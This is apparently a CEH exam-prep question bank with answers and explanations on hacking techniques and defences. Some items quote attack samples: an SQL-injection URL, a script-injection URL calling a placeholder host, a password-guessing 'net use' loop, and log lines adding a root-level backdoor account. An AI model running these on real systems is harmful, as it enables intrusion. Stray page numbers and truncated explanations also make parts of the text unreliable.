183 In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack? A. Full Blown B. Thorough C. Hybrid D. BruteDics

C (Explanation: A combination of Brute force and Dictionary attack is called a Hybrid attack or Hybrid dictionary attack. 110)

387 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer) A. Cover his tracks by eradicating the log files and audit trails. B. Gain access to the remote computer in order to conceal the venue of attacks. C. Perform a reconnaissance of the remote target for identical of venue of attacks. D. Always begin with a scan in order to quickly identify venue of attacks.

C (Explanation: A hacker always starts with a preparatory phase (Reconnaissance) where he seeks to gather as much information as possible about the target of evaluation prior to launching an attack. The reconnaissance can be either passive or active (or both).)

156 Susan has attached to her company's network. She has managed to synchronize her boss's sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory. What kind of attack is Susan carrying on? 92 A. A sniffing attack B. A spoofing attack C. A man in the middle attack D. A denial of service attack

C (Explanation: A man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised.)

487 Which of the following is not an effective countermeasure against replay attacks? A. Digital signatures B. Time Stamps C. System identification D. Sequence numbers 293

C (Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. Effective countermeasures should be anything that makes it hard to delay or replay the packet (time stamps and sequence numbers) or anything that prove the package is received as it was sent from the original sender (digital signature))

419 In order to attack wireless network, you put up an access point and override the signal of the real access point. And when users send authentication data, you are able to capture it. What kind of attack is this? A. WEP Attack B. Drive by hacking C. Rogue Access Point Attack D. Unauthorized Access Point Attack

C (Explanation: A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network management or has been created to allow a cracker to conduct a man-in-the-middle attack.)

459 Exhibit Study the log given in the exhibit, Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate? 276 A. Disallow UDP 53 in from outside to DNS server B. Allow UDP 53 in from DNS server to outside C. Disallow TCP 53 in from secondaries or ISP server to DNS server D. Block all UDP traffic

C (Explanation: According to the exhibit, the question is regarding the DNS Zone Transfer. Since Zone Transfers are done with TCP port 53, you should not allow this connect external to you organization.)

187 Which of the following is the primary objective of a rootkit? A. It opens a port to provide an unauthorized service B. It creates a buffer overflow C. It replaces legitimate programs D. It provides an undocumented opening in a program

C (Explanation: Actually the objective of the rootkit is more to hide the fact that a system has been compromised and the normal way to do this is by exchanging, for example, ls to a version that doesn't show the files and process implanted by the attacker. 112)

192 What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common? A. All are hacking tools developed by the legion of doom B. All are tools that can be used not only by hackers, but also security personnel C. All are DDOS tools D. All are tools that are only effective against Windows E. All are tools that are only effective against Linux

C (Explanation: All are DDOS tools.)

482 What is a sheepdip? A. It is another name for Honeynet B. It is a machine used to coordinate honeynets C. It is the process of checking physical media for virus before they are used in a computer D. None of the above

C (Explanation: Also known as a footbath, a sheepdip is the process of checking physical media, such as floppy disks or CD-ROMs, for viruses before they are used in a computer. Typically, a computer that sheepdips is used only for that process and nothing else and is isolated from the other computers, meaning it is not connected to the network. Most sheepdips use at least two different antivirus programs in order to increase effectiveness.)

424 What are the main drawbacks for anti-virus software? 253 A. AV software is difficult to keep up to the current revisions. B. AV software can detect viruses but can take no action. C. AV software is signature driven so new exploits are not detected. D. It's relatively easy for an attacker to change the anatomy of an attack to bypass AV systems E. AV software isn't available on all major operating systems platforms. F. AV software is very machine (hardware) dependent.

C (Explanation: Although there are functions like heuristic scanning and sandbox technology, the Antivirus program is still mainly depending of signature databases and can only find already known viruses.)

514 SSL has been as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A to Point B? A. SSL is redundant if you already have IDS's in place B. SSL will trigger rules at regular interval and force the administrator to turn them off C. SSL will make the content of the packet and Intrusion Detection System are blinded D. SSL will slow down the IDS while it is breaking the encryption to see the packet content

C (Explanation: An IDS will not be able to evaluate the content in the packets if it is encrypted. 312)

43 What type of port scan is shown below? A. Idle Scan B. Windows Scan C. XMAS Scan 27 D. SYN Stealth Scan

C (Explanation: An Xmas port scan is variant of TCP port scan. This type of scan tries to obtain information about the state of a target port by sending a packet which has multiple TCP flags set to 1 - "lit as an Xmas tree". The flags set for Xmas scan are FIN, URG and PSH. The purpose is to confuse and bypass simple firewalls. Some stateless firewalls only check against security policy those packets which have the SYN flag set (that is, packets that initiate connection according to the standards). Since Xmas scan packets are different, they can pass through these simple systems and reach the target host.)

297 Peter has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the External Gateway interface. Further inspection reveals they are not responses from internal hosts request but simply responses coming from the Internet. What could be the likely cause of this? A. Someone Spoofed Peter's IP Address while doing a land attack B. Someone Spoofed Peter's IP Address while doing a DoS attack C. Someone Spoofed Peter's IP Address while doing a smurf Attack D. Someone Spoofed Peter's IP address while doing a fraggle attack 178

C (Explanation: An attacker sends forged ICMP echo packets to broadcast addresses of vulnerable networks with forged source address pointing to the target (victim) of the attack. All the systems on these networks reply to the victim with ICMP echo replies. This rapidly exhausts the bandwidth available to the target.)

315 A majority of attacks come from insiders, people who have direct access to a company's computer system as part of their job function or a business relationship. Who is considered an insider? A. The CEO of the company because he has access to all of the computer systems B. A government agency since they know the company computer system strengths and weaknesses C. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants D. A competitor to the company because they can directly benefit from the publicity generated by making such an attack

C (Explanation: An insider is anyone who already has an foot inside one way or another.)

41 You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state. What should be the next logical step that should be performed? A. Connect to open ports to discover applications. B. Perform a ping sweep to identify any additional systems that might be up. C. Perform a SYN scan on port 21 to identify any additional systems that might be up. D. Rescan every computer to verify the results.

C (Explanation: As ICMP is blocked you'll have trouble determining which computers are up and running by using a ping sweep. As all the 23 computers that you had discovered earlier had port 21 closed, probably any additional, previously unknown, systems will also have port 21 closed. By running a SYN scan on port 21 over the target network you might get replies from additional systems.)

538 Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as? A. Symmetric system B. Combined system C. Hybrid system D. Asymmetric system

C (Explanation: Because of the complexity of the underlying problems, most public-key algorithms involve operations such as modular multiplication and exponentiation, which are much more 328 computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly "hybrid" systems, in which a fast symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.)

53 What does an ICMP (Code 13) message normally indicates? A. It indicates that the destination host is unreachable B. It indicates to the host that the datagram which triggered the source quench message will need to be re-sent C. It indicates that the packet has been administratively dropped in transit D. It is a request to the host to cut back the rate at which it is sending traffic to the Internet destination

C (Explanation: CODE 13 and type 3 is destination unreachable due to communication administratively prohibited by filtering hence maybe they meant "code 13", therefore would be C). Note:A - Type 3B - Type 4C - Type 3 Code 13D - Typ4 4 33)

348 An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the price? A. By using SQL injection B. By using cross site scripting C. By changing hidden form values in a local copy of the web page D. There is no way the attacker could do this without directly compromising either the web server or the database

C (Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.)

368 Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? 219 A. An integer variable B. A 'hidden' price value C. A 'hidden' form field value D. A page cannot be changed locally; it can only be served by a web server

C (Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.)

189 Exhibit You receive an e-mail with the message displayed in the exhibit. From this e-mail you suspect that this message was sent by some hacker since you have using their e-mail services for the last 2 years and they never sent out an e-mail as this. You also observe the URL in the message and confirm your suspicion about 340590649. You immediately enter the following at the Windows 2000 command prompt. ping 340590649 You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL? 113 A. 192.34.5.9 B. 10.0.3.4 C. 203.2.4.5 D. 199.23.43.4

C (Explanation: Convert the number in binary, then start from last 8 bits and convert them to decimal to get the last octet (in this case .5))

96 You ping a target IP to check if the host is up. You do not get a response. You suspect ICMP is blocked at the firewall. Next you use hping2 tool to ping the target host and you get a response. Why does the host respond to hping2 and not ping packet? [ceh]# ping 10.2.3.4 PING 10.2.3.4 (10.2.3.4) from 10.2.3.80 : 56(84) bytes of data. --- 10.2.3.4 ping statistics --- 3 packets transmitted, 0 packets received, 100% packet loss [ceh]# ./hping2 -c 4 -n -i 2 10.2.3.4 HPING 10.2.3.4 (eth0 10.2.3.4): NO FLAGS are set, 40 headers + 0 data bytes len=46 ip=10.2.3.4 flags=RA seq=0 ttl=128 id=54167 win=0 rtt=0.8 ms len=46 ip=10.2.3.4 flags=RA seq=1 ttl=128 id=54935 win=0 rtt=0.7 ms len=46 ip=10.2.3.4 flags=RA seq=2 ttl=128 id=55447 win=0 rtt=0.7 ms len=46 ip=10.2.3.4 flags=RA seq=3 ttl=128 id=55959 win=0 rtt=0.7 ms --- 10.2.3.4 hping statistic --- 4 packets tramitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.7/0.8/0.8 ms A. ping packets cannot bypass firewalls B. you must use ping 10.2.3.4 switch C. hping2 uses TCP instead of ICMP by default D. hping2 uses stealth TCP packets to connect 56

C (Explanation: Default protocol is TCP, by default hping2 will send tcp headers to target host's port 0 with a winsize of 64 without any tcp flag on. Often this is the best way to do an 'hide ping', useful when target is behind a firewall that drop ICMP. Moreover a tcp null-flag to port 0 has a good probability of not being logged.)

252 Ethereal works best on ____________. A. Switched networks B. Linux platforms C. Networks using hubs D. Windows platforms E. LAN's

C (Explanation: Ethereal is used for sniffing traffic. It will return the best results when used on an unswitched (i.e. hub. network.))

2 What does the term "Ethical Hacking" mean? A. Someone who is hacking for ethical reasons. B. Someone who is using his/her skills for ethical reasons. C. Someone who is using his/her skills for defensive purposes. D. Someone who is using his/her skills for offensive purposes.

C (Explanation: Ethical hacking is only about defending your self or your employer against malicious persons by using the same techniques and skills.)

158 Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate 93 Alice machine. From the command prompt, she types the following command. For /f "tokens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:"Administrator" %%a What is Eve trying to do? A. Eve is trying to connect as an user with Administrator privileges B. Eve is trying to enumerate all users with Administrative privileges C. Eve is trying to carry out a password crack for user Administrator D. Eve is trying to escalate privilege of the null user to that of Administrator

C (Explanation: Eve tries to get a successful login using the username Administrator and passwords from the file hackfile.txt.)

417 Sally is a network admin for a small company. She was asked to install wireless accesspoints in the building. In looking at the specifications for the access-points, she sees that all of them offer WEP. Which of these are true about WEP? Select the best answer. A. Stands for Wireless Encryption Protocol B. It makes a WLAN as secure as a LAN C. Stands for Wired Equivalent Privacy D. It offers end to end security

C (Explanation: Explanations: WEP is intended to make a WLAN as secure as a LAN but because a WLAN is not constrained by wired, this makes access much easier. Also, WEP has flaws that make it less secure than was once thought.WEP does not offer end-to-end security. It only attempts to protect the wireless portion of the network.)

216 You are a Administrator of Windows server. You want to find the port number for POP3. What file would you find the information in and where? Select the best answer. A. %windir%\\etc\\services B. system32\\drivers\\etc\\services C. %windir%\\system32\\drivers\\etc\\services D. /etc/services E. %windir%/system32/drivers/etc/services

C (Explanation: Explanations: %windir%\\system32\\drivers\\etc\\services is the correct place to look for this information. 128)

150 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. How do you prevent DNS spoofing? (Select the Best Answer.) A. Install DNS logger and track vulnerable packets B. Disable DNS timeouts C. Install DNS Anti-spoofing D. Disable DNS Zone Transfer

C (Explanation: Explantion: Implement DNS Anit-Spoofing measures to prevent DNS Cache Pollution to occur.)

391 Identify SQL injection attack from the HTTP requests shown below: A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999 B. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al C. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass wd%3d%27hAx0r%27%3b--%00 D. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser ver.c0m%2fbadscript.js%22% 3e%3c%2fscript%3e

C (Explanation: Explantion: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r)

410 Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is being followed here? A. no authentication B. single key authentication C. shared key authentication D. open system authentication

C (Explanation: Explantion: The following picture shows how the WEP authentication procedure:)

152 Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!'' From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: H@cker Mess@ge: Y0u @re De@d! Fre@ks! After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack? A. ARP spoofing B. SQL injection C. DNS poisoning D. Routing table injection

C (Explanation: External calls for the Web site has been redirected to another server by a successful 90 DNS poisoning.)

258 When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this? A. macof B. webspy C. filesnarf D. nfscopy

C (Explanation: Filesnarf - sniff files from NFS traffic OPTIONS -i interface Specify the interface to listen on. -v "Versus" mode. Invert the sense of matching, to select non-matching files. pattern Specify regular expression for filename matching. expression Specify a tcpdump(8) filter expression to select traffic to sniff. SEE ALSO Dsniff, nfsd)

494 What is the tool Firewalk used for? A. To test the IDS for proper operation B. To test a firewall for proper operation C. To determine what rules are in place for a firewall D. To test the webserver configuration E. Firewalk is a firewall auto configuration tool

C (Explanation: Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device "firewall" will pass. Firewalk works 299 by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway host does not allow the traffic, it will likely drop the packets and no response will be returned.)

509 An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS? Select the best answer. A. Firewalk B. Manhunt C. Fragrouter D. Fragids

C (Explanation: Firewalking is a way to disguise a portscan. Thus, firewalking is not a tool, but a method ofconducting a port scan in which it can be hidden from some firewalls. Synamtec Man-Hunt is an IDS, not a tool to evade an IDS. Fragrouter is a tool that can take IP traffic and fragment it into multiple pieces. There is a legitimate reason that fragmentation is done, but it is also a technique that can help an attacker to evade detection while Fragids is a made-up tool and does not exist.)

463 278 Why would an ethical hacker use the technique of firewalking? A. It is a technique used to discover wireless network on foot. B. It is a technique used to map routers on a network link. C. It is a technique used to discover the nature of rules configured on a gateway. D. It is a technique used to discover interfaces in promiscuous mode.

C (Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway.)

367 Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to? A. Cross Site Scripting B. SQL injection Attack C. Format String Attack D. Unicode Traversal Attack

C (Explanation: Format string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .)

513 An Employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by the network based IDS application? A. Create a ping flood B. Create a SYN flood C. Create a covert network tunnel D. Create multiple false positives

C (Explanation: HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed a HTTP Tunnel. Very few firewalls blocks outgoing HTTP traffic.)

333 You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges? A. Administrator B. IUSR_COMPUTERNAME C. LOCAL_SYSTEM D. Whatever account IIS was installed with

C (Explanation: If you manage to get the system to start a shell for you, that shell will be running as LOCAL_SYSTEM.)

411 246 Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. You would like to recommend a tool that uses KoreK's implementation. Which tool would you recommend from the list below? A. Kismet B. Shmoo C. Aircrack D. John the Ripper

C (Explanation: Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. John the Ripper is a password cracker, Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system, and)

383 Bob has been hired to do a web application security test. Bob notices that the site is dynamic and infers that they mist be making use of a database at the application back end. Bob wants to validate whether SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL requests? A. Semi Column B. Double Quote C. Single Quote D. Exclamation Mark 229

C (Explanation: In SQL single quotes are used around values in queries, by entering another single quote Bob tests if the application will submit a null value and probably returning an error.)

530 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it can't mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error 323

C (Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security.)

288 How does a denial-of-service attack work? A. A hacker tries to decipher a password by using a system, which subsequently crashes the network B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person 173 C. A hacker prevents a legitimate user (or group of users) from accessing a service D. A hacker uses every character, word, or letter he or she can think of to defeat authentication

C (Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).)

246 John wants to try a new hacking tool on his Linux System. As the application comes from a site in his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which of the following options would indicate the best course of action for John? A. Obtain the application via SSL B. Obtain the application from a CD-ROM disc C. Compare the files' MD5 signature with the one published on the distribution media D. Compare the file's virus signature with the one published on the distribution media

C (Explanation: In essence, MD5 is a way to verify data integrity, and is much more reliable than checksum and many other commonly used methods.)

361 You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from 215 inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing ? A. Black box testing B. Black hat testing C. Gray box testing D. Gray hat testing E. White box testing F. White hat testing

C (Explanation: Internal Testing is also referred to as Gray-box testing.)

357 Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always make use of a basic Web Browser to perform such testing. Which of the following web browser can adequately fill this purpose? A. Internet Explorer B. Mozila C. Lynx D. Tiger

C (Explanation: Lynx is a program used to browse the World Wide Web, which works on simple text 213 - - - terminals, rather than requiring a graphical computer display terminal.)

179 Study the snort rule given below: 107 From the options below, choose the exploit against which this rule applies. A. WebDav B. SQL Slammer C. MS Blaster D. MyDoom

C (Explanation: MS Blaster scans the Internet for computers that are vulnerable to its attack. Once found, it tries to enter the system through the port 135 to create a buffer overflow. TCP ports 139 and 445 may also provide attack vectors.)

69 Which of the following is an automated vulnerability assessment tool. A. Whack a Mole B. Nmap C. Nessus D. Kismet E. Jill32

C (Explanation: Nessus is a vulnerability assessment tool.)

71 ________ is an automated vulnerability assessment tool. A. Whack a Mole B. Nmap C. Nessus D. Kismet E. Jill32

C (Explanation: Nessus is a vulnerability assessment tool.)

70 John is using a special tool on his Linux platform that has a signature database and is therefore able to detect hundred of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts. Additionally, the database detects DDoS zombies and Trojans. What would be the name of this multifunctional tool? A. nmap B. hping C. nessus 42 D. make

C (Explanation: Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations world-wide. Nmap is mostly used for scanning, not for detecting vulnerabilities. Hping is a free packet generator and analyzer for the TCP/IP protocol and make is used to automatically build large applications on the *nix plattform.)

82 Which of the following Nmap commands would be used to perform a UDP scan of the lower 1024 ports? A. Nmap -h -U B. Nmap -hU <host(s.> C. Nmap -sU -p 1-1024 <host(s.> D. Nmap -u -v -w2 <host> 1-1024 E. Nmap -sS -O target/1024

C (Explanation: Nmap -sU -p 1-1024 <hosts.> is the proper syntax. Learning Nmap and its switches are critical for successful completion of the CEH exam.)

376 Which of the following is the best way an attacker can passively learn about technologies used in an organization? A. By sending web bugs to key personnel B. By webcrawling the organization web site C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization D. By performing a port scan on the organization's web site

C (Explanation: Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive" 224)

14 Which of the following activities will NOT be considered as passive footprinting? A. Go through the rubbish to find out any information that might have been discarded. B. Search on financial site such as Yahoo Financial to identify assets. C. Scan the range of IP address found in the target DNS database. D. Perform multiples queries using a search engine.

C (Explanation: Passive footprinting is a method in which the attacker never makes contact with the target systems. Scanning the range of IP addresses found in the target DNS is considered making contact to the systems behind the IP addresses that is targeted by the scan.)

33 Which of the following activities would not be considered passive footprinting? A. Search on financial site such as Yahoo Financial B. Perform multiple queries through a search engine C. Scan the range of IP address found in their DNS database D. Go through the rubbish to find out any information that might have been discarded

C (Explanation: Passive footprinting is a method in which the attacker never makes contact with the target. Scanning the targets IP addresses can be logged at the target and therefore contact has been made.)

448 After studying the following log entries, how many user IDs can you identify that the attacker has tampered with? 1. mkdir -p /etc/X11/applnk/Internet/.etc 2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd 3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/.etc 5. passwd nobody -d 6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. passwd dns -d 269 8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc A. IUSR_ B. acmr, dns C. nobody, dns D. nobody, IUSR_

C (Explanation: Passwd is the command used to modify a user password and it has been used together with the usernames nobody and dns.)

358 Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive obtain from the client before commencing his test? A. IP Range, OS, and patches installed. B. Only the IP address range. C. Nothing but corporate name. D. All that is available from the client site.

C (Explanation: Penetration tests can be conducted in one of two ways: black-box (with no prior knowledge the infrastructure to be tested) or white-box (with complete knowledge of the infrastructure to be tested). As you might expect, there are conflicting opinions about this choice and the value that either approach will bring to a project.)

386 Which of the following activities will not be considered passive footprinting? A. Go through the rubbish to find out any information that might have been discarded B. Search on financial site such as Yahoo Financial to identify assets C. Scan the range of IP address found in the target DNS database D. Perform multiples queries using a search engine 231

C (Explanation: Scanning is not considered to be passive footprinting.)

415 Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? A. All IVs are vulnerable to attack B. Air Snort uses a cache of packets C. Air Snort implements the FMS attack and only encrypted packets are counted D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers

C (Explanation: Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin- Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.)

284 What do you call a system where users need to remember only one username and password, and be authenticated for multiple services? A. Simple Sign-on B. Unique Sign-on C. Single Sign-on D. Digital Certificate 171

C (Explanation: Single sign-on (SSO) is a specialized form of software authentication that enables a user to authenticate once and gain access to the resources of multiple software systems.)

304 Why is Social Engineering considered attractive by hackers and also adopted by experts in the field? A. It is done by well known hackers and in movies as well. B. It does not require a computer in order to commit a crime. C. It is easy and extremely effective to gain information. D. It is not considered illegal.

C (Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most (but not all) cases the attacker never comes face-to-face with the victim. The term has been popularized in recent years by well known (reformed) computer criminal and security consultant Kevin Mitnick who points out that it's much easier to trick someone into giving you his or her password for a system than to spend the effort to hack in. He claims it to be the single most effective method in his arsenal.)

320 Jack Hackers wants to break into Brown's Computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co. pretending to be an administrator from Brown Co. Jack tell Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss and parts her password. Jack can now access Brown Co.'s computer with a valid username and password to steal the cookie recipe. What kind of attack is being illustrated here? A. Faking Identity B. Spoofing Identity C. Social Engineering D. Reverse Psychology E. Reverse Engineering 192

C (Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most cases the attacker never comes face-to-face with the victim.)

253 152 The follows is an email header. What address is that of the true originator of the message? Return-Path: <[email protected]> Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 for <[email protected]>; Sat, 9 Aug 2003 18:18:50 -0500 Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from ([19.25.19.10]. by smtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" <[email protected]> To: "mikeg" <[email protected]> Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID: <51.32.123.21@CHRISLAPTOP> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal. X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal 153 A. 19.25.19.10 B. 51.32.123.21 C. 168.150.84.123 D. 215.52.220.122 E. 8.10.2/8.10.2

C (Explanation: Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address 168.150.84.123 is the true source of the)

440 You have just installed a new Linux file server at your office. This server is going to be used by several individuals in the organization, and unauthorized personnel must not be able to modify any data. What kind of program can you use to track changes to files on the server? A. Network Based IDS (NIDS) B. Personal Firewall C. System Integrity Verifier (SIV) D. Linux IP Chains

C (Explanation: System Integrity Verifiers like Tripwire aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. 264)

255 Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files? A. Snort B. argus C. TCPflow D. Tcpdump 154

